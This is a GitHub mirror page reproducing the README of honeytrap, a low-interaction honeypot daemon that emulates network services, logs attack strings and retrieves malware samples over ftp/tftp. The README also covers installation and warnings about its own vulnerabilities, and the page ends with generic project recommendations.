sengkoil / honeytrap Goto Github PK
View Code? Open in Web Editor NEWThis project forked from armedpot/honeytrap
Last download from git://git.carnivore.it/honeytrap.git of Honytrap by Tillmann Werner
License: GNU General Public License v2.0
honeytrap's Introduction
README Honeytrap is a network security tool written to observe attacks against TCP or UDP services. It runs as a daemon and starts serv- er processes dynamically on requested ports. A server emulates a well-known service by simply sending captured network traffic to a connected host. Many clients and particularly attackers will be fooled and send responses to a honeytrap server process. The arriving data is as- sembled to a string and written to a database file. Such a string is called an attack string. Honeytrap can parse an attack string for commands advising the server to download a file from another host. If a download com- mand is found, the server tries to retrieve the corresponding file automatically. A downloaded file is stored locally with an md5 checksum in its name. Currently, only ftp and tftp are sup- ported. Honeytrap implements its own clients with the aim to be- have as similar as possible than Windows systems. Http URIs are recognized and logged. A http download routine may be added in future releases. INSTALLATION Installation of honeytrap is pretty straight forward. Just do a './configure --with-stream-mon=<type> && make && make install' where '<type>' is the connection monitor type of your choice. Please refer to the INSTALL file and to the output of './config- ure --help' for further information. WARNINGS Honeytrap is a low-interactive honeypot and therefore detectable. It is written in C and thus potentially vulnerable to buffer overflow attacks. Take care. Running in mirror mode is dangerous. Attacks may be directed to the attacker, appearing to come from your system. Use with caution. The program needs root privileges, but only for binding server processes to well-known ports. Use the -u and -g command line op- tions to drop privileges and switch to another user and group as early as possible. CONTACT If you have problems, questions, ideas or suggestions, please contact me at <[email protected]>. If you would like to help making honeytrap better, you are welcome.
honeytrap's People
Contributors
Watchers
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.